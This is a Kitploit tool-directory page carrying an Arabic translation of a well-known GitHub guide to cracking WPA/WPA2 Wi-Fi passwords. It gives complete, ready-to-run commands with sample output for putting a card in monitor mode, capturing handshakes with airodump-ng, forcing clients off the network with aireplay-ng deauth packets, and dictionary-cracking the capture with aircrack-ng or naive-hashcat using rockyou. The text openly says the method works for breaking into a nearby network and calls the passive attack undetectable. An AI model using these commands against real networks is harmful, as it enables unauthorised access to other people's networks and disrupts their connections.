Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wifi-cracking — اختراق أجهزة توجيه Wi-Fi WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat | Kitploit
أدوات/GitHubGitHub/brannondorsey/wifi-cracking
كسر كلمات المرورتدقيق Wi-Fiالتعلم والتعليم
GitHubbrannondorsey/wifi-cracking

wifi-cracking

اختراق أجهزة توجيه Wi-Fi WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat

عرض المستودع
12.6k1.2kمنذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اختراق شبكات Wi-Fi

اختراق أجهزة التوجيه (الراوترات) التي تعمل ببروتوكول WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat.

هذا دليل إرشادي موجز يوضح كيفية اختراق شبكات Wi-Fi المحمية بكلمات مرور ضعيفة. إنه ليس شاملاً، لكنه ينبغي أن يوفر معلومات كافية لك لاختبار أمان شبكتك الخاصة أو اقتحام شبكة قريبة. الهجوم الموضح أدناه هو هجوم سلبي بالكامل (استماع فقط، لا يتم بث أي شيء من حاسوبك) ومن المستحيل اكتشافه بشرط ألا تستخدم كلمة المرور التي تخترقها. يمكن استخدام هجوم إلغاء المصادقة النشط الاختياري لتسريع عملية الاستطلاع، وهو موضح في نهاية هذا المستند.

إذا كنت على دراية بهذه العملية، يمكنك تخطي الشروحات والانتقال إلى قائمة الأوامر المستخدمة في الأسفل. للحصول على مجموعة من الاقتراحات والطرق البديلة، راجع الملحق. قام كل من neal1991 و tiiime بتقديم ترجمات لهذا المستند و الملحق باللغة الصينية إذا كنت تفضل تلك النسخ.

إخلاء مسؤولية: هذا البرنامج/الدليل هو لأغراض تعليمية فقط. لا ينبغي استخدامه في أنشطة غير قانونية. المؤلف غير مسؤول عن استخدامه. لا تكن وغداً.

البدء

يفترض هذا الدليل أنك:

  • لديك إلمام عام باستخدام سطر الأوامر
  • تستخدم توزيعة لينكس قائمة على Debian، ويفضل Kali Linux (مستخدمو OSX يراجعون الملحق)
  • لديك Aircrack-ng مثبتاً
    • sudo apt-get install aircrack-ng
  • لديك بطاقة لاسلكية تدعم وضع المراقبة (monitor mode) (انظر هنا للحصول على قائمة بالأجهزة المدعومة)

اختراق شبكة Wi-Fi

وضع المراقبة

ابدأ بإدراج الواجهات اللاسلكية التي تدعم وضع المراقبة باستخدام:

root@kitploit:~
airmon-ng

إذا لم ترَ واجهة مدرجة، فإن بطاقتك اللاسلكية لا تدعم وضع المراقبة 😞

سنفترض أن اسم واجهتك اللاسلكية هو wlan0 لكن تأكد من استخدام الاسم الصحيح إذا كان مختلفاً عن هذا. بعد ذلك، سنضع الواجهة في وضع المراقبة:

root@kitploit:~
airmon-ng start wlan0

قم بتشغيل iwconfig. يجب أن ترى الآن واجهة وضع مراقبة جديدة مدرجة (على الأرجح mon0 أو wlan0mon).

العثور على هدفك

ابدأ الاستماع إلى إطارات Beacon 802.11 التي تبثها أجهزة التوجيه اللاسلكية القريبة باستخدام واجهة المراقبة الخاصة بك:

root@kitploit:~
airodump-ng mon0

يجب أن ترى مخرجات مشابهة لما يلي.

root@kitploit:~
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

لأغراض هذا العرض التوضيحي، سنختار اختراق كلمة مرور شبكتي "hackme". احفظ عنوان BSSID MAC ورقم القناة (CH) كما يظهره airodump-ng، لأننا سنحتاجهما في الخطوة التالية.

التقاط المصافحة الرباعية (4-way Handshake)

يستخدم WPA/WPA2 مصافحة رباعية لمصادقة الأجهزة على الشبكة. ليس عليك معرفة أي شيء عن معنى ذلك، لكن يجب عليك التقاط إحدى هذه المصافحات لكسر كلمة مرور الشبكة. تحدث هذه المصافحات عندما يتصل جهاز بالشبكة، على سبيل المثال، عندما يعود جارك من العمل إلى المنزل. نلتقط هذه المصافحة بتوجيه airmon-ng لمراقبة حركة المرور على الشبكة المستهدفة باستخدام قيم القناة و bssid التي تم اكتشافها من الأمر السابق.

root@kitploit:~
# استبدل قيم -c و --bssid بقيم شبكتك المستهدفة
# -w تحدد الدليل حيث سنحفظ التقاط الحزم
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
root@kitploit:~
 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

الآن ننتظر... بمجرد التقاط مصافحة، يجب أن ترى شيئاً مثل [ WPA handshake: bc:d3:c9:ef:d2:67 في أعلى يمين الشاشة، مباشرة على يمين الوقت الحالي.

إذا كنت تشعر بنفاد الصبر، وتشعر بالراحة تجاه استخدام هجوم نشط، يمكنك إجبار الأجهزة المتصلة بالشبكة المستهدفة على إعادة الاتصال، عن طريق إرسال حزم إلغاء مصادقة خبيثة إليها. يؤدي هذا غالباً إلى التقاط مصافحة رباعية. راجع قسم هجوم إلغاء المصادقة أدناه للحصول على معلومات حول هذا.

بمجرد التقاط المصافحة، اضغط ctrl-c للخروج من airodump-ng. يجب أن ترى ملف .cap حيثما أخبرت airodump-ng بحفظ الالتقاط (غالباً ما يسمى -01.cap). سنستخدم ملف الالتقاط هذا لاختراق كلمة مرور الشبكة. أحب إعادة تسمية هذا الملف ليعكس اسم الشبكة التي نحاول اختراقها:

root@kitploit:~
mv ./-01.cap hackme.cap

اختراق كلمة مرور الشبكة

الخطوة الأخيرة هي اختراق كلمة المرور باستخدام المصافحة التي تم التقاطها. إذا كان لديك إمكانية الوصول إلى وحدة معالجة رسوميات (GPU)، فإنني أوصي بشدة باستخدام hashcat لاختراق كلمة المرور. لقد أنشأت أداة بسيطة تجعل استخدام hashcat سهلاً للغاية تسمى naive-hashcat. إذا لم يكن لديك إمكانية الوصول إلى GPU، فهناك العديد من خدمات اختراق GPU عبر الإنترنت التي يمكنك استخدامها، مثل GPUHASH.me أو OnlineHashCrack. يمكنك أيضاً تجربة اختراق باستخدام وحدة المعالجة المركزية (CPU) باستخدام Aircrack-ng.

ضع في اعتبارك أن كلتا طريقتي الهجوم أدناه تفترضان كلمة مرور ضعيفة نسبياً يولدها المستخدم. تأتي معظم أجهزة التوجيه WPA/WPA2 بكلمات مرور عشوائية قوية مكونة من 12 حرفاً يتركها العديد من المستخدمين (بحق) دون تغيير. إذا كنت تحاول اختراق إحدى كلمات المرور هذه، فإنني أوصي باستخدام ملفات قاموس Probable-Wordlists WPA-length.

الاختراق باستخدام naive-hashcat (موصى به)

قبل أن نتمكن من اختراق كلمة المرور باستخدام naive-hashcat، نحتاج إلى تحويل ملف .cap الخاص بنا إلى تنسيق ملف hashcat المكافئ .hccapx. يمكنك القيام بذلك بسهولة إما عن طريق رفع ملف .cap إلى https://hashcat.net/cap2hccapx/ أو باستخدام أداة cap2hccapx مباشرة.

root@kitploit:~
cap2hccapx.bin hackme.cap hackme.hccapx

بعد ذلك، قم بتنزيل وتشغيل naive-hashcat:

root@kitploit:~
# تحميل
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# تحميل ملف القاموس rockyou بحجم 134 ميجابايت
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# اختراق ! هيا ! اختراق !
# 2500 هو وضع تجزئة hashcat لشبكات WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

يستخدم Naive-hashcat هجمات مختلفة مثل القاموس، و القاعدة، و التجميع، و القناع (القوة الغاشمة الذكية) ويمكن أن يستغرق أياماً أو حتى أشهراً لمواجهة كلمات المرور متوسطة القوة. سيتم حفظ كلمة المرور المخترقة في hackme.pot، لذا تحقق من هذا الملف بشكل دوري. بمجرد اختراق كلمة المرور، يجب أن ترى شيئاً مثل هذا كمحتويات POT_FILE الخاص بك:

root@kitploit:~
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

حيث الحقلان الأخيران المفصولان بـ : هما اسم الشبكة وكلمة المرور على التوالي.

إذا كنت ترغب في استخدام hashcat بدون naive-hashcat، راجع هذه الصفحة للحصول على معلومات.

الاختراق باستخدام Aircrack-ng

يمكن استخدام Aircrack-ng لهجمات القاموس الأساسية جداً التي تعمل على وحدة المعالجة المركزية (CPU) الخاصة بك. قبل تشغيل الهجوم، تحتاج إلى قائمة كلمات. أوصي باستخدام ملف القاموس rockyou الشهير:

root@kitploit:~
# تحميل ملف القاموس rockyou بحجم 134 ميجابايت
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

ملاحظة، إذا لم تكن كلمة مرور الشبكة موجودة في ملف الكلمات، فلن تتمكن من اختراق كلمة المرور.

root@kitploit:~
# -a2 يحدد WPA2، -b هو BSSID، -w هو ملف الكلمات
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap

إذا تم اختراق كلمة المرور، فسترى رسالة KEY FOUND! في الطرفية متبوعة بنسخة النص العادي لكلمة مرور الشبكة.

root@kitploit:~
                                 Aircrack-ng 1.2 beta3


                   [00:01:49] 111040 keys tested (1017.96 k/s)


                         KEY FOUND! [ hacktheplanet ]


      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 

هجوم إلغاء المصادقة (Deauth Attack)

يقوم هجوم إلغاء المصادقة بإرسال حزم إلغاء مصادقة مزورة من جهازك إلى عميل متصل بالشبكة التي تحاول اختراقها. تتضمن هذه الحزم عناوين "مرسل" مزيفة تجعلها تبدو للعميل كما لو تم إرسالها من نقطة الوصول نفسها. عند استلام مثل هذه الحزم، يقطع معظم العملاء اتصالهم بالشبكة ويعيدون الاتصال فوراً، مما يوفر لك مصافحة رباعية إذا كنت تستمع باستخدام airodump-ng.

استخدم airodump-ng لمراقبة نقطة وصول محددة (باستخدام -c channel --bssid MAC) حتى ترى عميلاً (STATION) متصلاً. يبدو العميل المتصل شيئاً مثل هذا، حيث 64:BC:0C:48:97:F7 هو MAC العميل.

root@kitploit:~
 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]                                         
                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS                                                         
                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS

الآن، اترك airodump-ng قيد التشغيل وافتح نافذة طرفية جديدة. سنستخدم أمر aireplay-ng لإرسال حزم إلغاء مصادقة مزورة إلى عميلنا الضحية، مما يجبره على إعادة الاتصال بالشبكة ونأمل في الحصول على المصافحة أثناء هذه العملية.

root@kitploit:~
# -0 2 يحدد أننا نود إرسال حزمتي إلغاء مصادقة. قم بزيادة هذا الرقم
# إذا لزم الأمر مع خطر مقاطعة نشاط شبكة العميل بشكل ملحوظ
# -a هو MAC نقطة الوصول
# -c هو MAC العميل
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

يمكنك اختيارياً بث حزم إلغاء المصادقة إلى جميع العملاء المتصلين باستخدام:

root@kitploit:~
# ليس كل العملاء يحترمون بث إلغاء المصادقة رغم ذلك
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0

بمجرد إرسال حزم إلغاء المصادقة، عد إلى عملية airodump-ng الخاصة بك، ومع الحظ يجب أن ترى الآن شيئاً مثل هذا في أعلى اليمين: [ WPA handshake: 9C:5C:8E:C9:AB:C0. الآن بعد أن التقطت مصافحة، يجب أن تكون مستعداً لاختراق كلمة مرور الشبكة.

قائمة الأوامر

فيما يلي قائمة بجميع الأوامر اللازمة لاختراق شبكة WPA/WPA2، بالترتيب، مع شرح بسيط.

root@kitploit:~
# ضع جهاز الشبكة الخاص بك في وضع المراقبة
airmon-ng start wlan0

# استمع لجميع إطارات beacon القريبة للحصول على BSSID وقناة الهدف
airodump-ng mon0

# ابدأ الاستماع للمصافحة
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# اختيارياً، قم بإلغاء مصادقة عميل متصل لفرض المصافحة
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## اختراق كلمة المرور باستخدام aircrack-ng... ##########

# قم بتحميل ملف القاموس rockyou.txt بحجم 134 ميجابايت إذا لزم الأمر
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# اختراق باستخدام aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## أو اختراق كلمة المرور باستخدام naive-hashcat ##########

# تحويل cap إلى hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# اختراق باستخدام naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

الملحق

كانت الاستجابة لهذا الدليل كبيرة جداً لدرجة أنني أضفت اقتراحات ومواد إضافية من أعضاء المجتمع كـ ملحق. اطلع عليه لتعلم كيفية:

  • التقاط المصافحات واختراق كلمات مرور WPA على MacOS/OSX
  • التقاط المصافحات من كل شبكة حولك باستخدام wlandump-ng
  • استخدام crunch لتوليد قوائم كلمات تتجاوز 100 جيجابايت أثناء التشغيل
  • تزوير عنوان MAC الخاص بك باستخدام macchanger

يتوفر أيضاً نسخة صينية من الملحق.

الإسناد

تم استخلاص الكثير من المعلومات المقدمة هنا من الدليل الرائع لويس إينكارناسيون. شكراً أيضاً للمؤلفين والمشرفين الرائعين الذين يعملون على Aircrack-ng و Hashcat.

شكر جزيل لـ neal1991 و tiiime لترجمة هذا الدليل إلى الصينية. وشكر إضافي لـ yizhiheng، hiteshnayak305، enilfodne، DrinkMoreCodeMore، hivie7510، cprogrammer1994، 0XE4، hartzell، zeeshanu، flennic، bhusang، tversteeg، gpetrousov، crowchirp و Shark0der الذين قدموا أيضاً اقتراحات وإصلاحات للأخطاء المطبعية على Reddit و GitHub. إذا كنت مهتماً بسماع بعض البدائل المقترحة لـ WPA2، تحقق من بعض النقاشات الرائعة على هذا المنشور على Hacker News.

تنزيل الأداة